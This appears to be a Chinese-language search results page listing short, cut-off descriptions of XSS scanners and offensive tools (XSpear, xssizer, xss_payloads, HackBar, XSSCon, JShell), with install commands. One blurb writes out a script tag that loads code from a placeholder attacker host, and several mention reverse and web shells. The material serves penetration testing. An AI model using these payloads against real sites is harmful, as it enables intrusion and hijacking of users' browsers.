搜索 “XSS”

XSpear XSS扫描器 XSpear是一款基于RubyGems的的XSS漏洞扫描器。拥有常见的XSS漏洞扫描攻击测试功能。还可进行参数分析。 XSS漏洞扫描器 主要特点 基于模式匹配的XSS扫描检测alert confirm prompt无头浏览器上的事件（使用Selenium）测试XSS保护旁路和反射参数的请求/响应反射的参数过滤测试 event handler HTML tag Special Ch...

xssizer XSS工具 xssizer帮助渗透测试人员，漏洞猎手和其他安全专业人员轻松检测此类漏洞，并生成可立即使用的XSS Payloads PoC漏洞利用以进行演示。 xssizer XSS工具 xssizer安装与使用 安装 由于是PHP+JS项目，你需要一个server服务来运行它。 # 下载项目 $ git clone https://github.com...

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞：alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

HackBar (Burpsuite插件) HackBar是一个基于java的Burpsuite插件，支持很多高效便携的功能，例如： SQL注入容错SQL注入常用SQL注入语法XSS常见LFI漏洞WEB Shell反弹Shell 依赖 BurpsuiteJava HackBar安装 点击下载HackBarBurpsuite->扩展：添加jar开始使用吧 已经测试的环境 Burpsuite 1.7.36Windows 10xubu...

XSSCon介绍 XSSCon是一个用于扫描和利用XSS漏洞的工具，基于python 3.7编写。 XSSCon XSS扫描工具界面 主要特点 抓取网站上的所有链接（爬虫引擎）支持POST和GET表单许多可以自定义的设置高级错误处理多任务支持支持代理支持cookie等等.... XSSCon安装 apt-get install python3 git clone ...

JShell介绍 JShell是一个使用XSS获取JavaScript shell的脚本，基于python。 JShell安装与使用 # 下载 $ git clone https://github.com/s0md3v/JShell.git # 使用 $ python shell.py 12345 # 下载$ git clone https://github.com/s0md3v/JShell.git # ...